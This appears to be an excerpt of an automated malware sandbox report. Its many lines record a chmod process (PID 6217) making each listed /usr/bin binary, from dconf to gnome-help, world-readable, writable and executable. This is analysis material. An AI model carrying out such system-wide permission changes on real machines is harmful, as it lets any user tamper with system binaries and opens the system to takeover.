Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ddstdecode (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deallocvt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deb-systemd-helper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/deb-systemd-invoke (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-apt-progress (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-communicate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-copydb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-escape (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-set-selections (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/debconf-show (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/delv (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-install (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/desktop-file-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/devdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/df (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dfu-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_bash-completion (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_installxmlcatalogs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_perl_openssl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dh_python2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/diff3 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dig (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dir (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dircolors (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirmngr-client (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dirsplit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/disco (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dm-tool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmcs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dmesg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dnsdomainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/do-release-upgrade (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/domainname (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-deb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-divert (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-maintscript-helper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-split (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-statoverride (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dpkg-trigger (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/driverless (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2rng (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dtd2xsd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/du (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dumpkeys (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dvipdf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/dwp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eatmydata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ec2metadata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/echo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ed (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/editres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/egrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eject (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/elfedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enc2xs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/encguess (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/enchant-lsmod-2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/engrampa (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/env (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/envsubst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eps2eps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/erb2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/esc-m (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/espeak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/eutp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-previewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/evince-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ex (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-desktop-item-edit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-open (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/exo-preferred-applications (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expand (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expiry (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/expr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/factor (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/faillog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fallocate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/false (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-cat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-conflist (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-match (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-pattern (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-query (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-scan (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fc-validate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgconsole (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fgrep (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/file2brl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/finalrd (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fincore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/find (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/findmnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/firefox (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/flock (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fmt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fold (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fonttosfnt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2ddst-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hbpl2-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hiperc-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2hp2600-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2lava-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2oak-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2qpdl-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2slx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2xqx-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-icc2ps (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-pstops (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foo2zjs-wrapper (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/foomatic-rip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-delete (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-enroll (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-list (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fprintd-verify (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/free (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/from (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ftp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/funzip (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fuser (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fusermount (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdagent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdate (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdmgr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/fwupdtpmevlog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gacutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gamma4scanimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gapplication (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gatttool (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gawk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcore (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gcr-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdb-add-index (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbtui (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdbus (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdialog (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-csource (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-pixdata (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdk-pixbuf-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdm-screenshot (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gdmflexiserver (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gedit (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gem2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genisoimage (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/genxs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geqn (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getcifsacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getconf (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/geteltorito (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getent (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getfacl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getkeycodes (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/getopt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gettext.sh (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ghostscript (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gigolo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-console-2.10 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gimp-test-clipboard-2.0 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ginstall-info (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gio-querymodules (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gipddecode (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-receive-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-shell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-archive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/git-upload-pack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gjs-console (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gkbd-keyboard-display (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glib-compile-schemas (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxdemo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxgears (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxheads (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/glxinfo (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-control-center (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-extensions (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-font-viewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/gnome-help (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior

Source: /bin/sh (PID: 6217)

